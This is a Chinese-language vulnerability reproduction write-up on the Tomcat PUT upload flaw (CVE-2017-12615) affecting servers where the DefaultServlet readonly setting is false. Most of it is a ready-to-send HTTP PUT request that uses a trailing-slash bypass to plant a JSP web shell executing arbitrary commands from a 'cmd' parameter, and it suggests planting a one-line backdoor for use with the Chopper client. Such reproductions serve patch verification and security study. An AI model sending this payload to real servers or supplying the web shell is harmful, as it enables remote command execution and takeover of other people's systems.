0x01 简介
在windows或linux服务器下将readonly参数设置为false(false并非默认配置),可通过PUT方法创建一个jsp文件,可执行任意命令。
<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
0x02 影响范围
Tomcat全版本 5.x - 9.x
0x03 漏洞复现
1.发送以下http数据包到服务器,由于Tomcat对文件后缀有检测,因此我们需要在新建的文件后缀添加一个“/”,这样就可以绕过检测,在windows和linux下都可以使用这种方式绕过。
PUT /a.jsp/ HTTP/1.1
Host: xx.xx.xx.xx:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=91DD89FBCC1307A04A8D6993DBF39919
Connection: close
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
效果:
我们也可以利用此方式编写一句话后门,然后通过菜刀进行连接。
参考:
https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md
https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e
![欢迎使用CSDN-markdown编辑器Tomcat的安装与配置[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)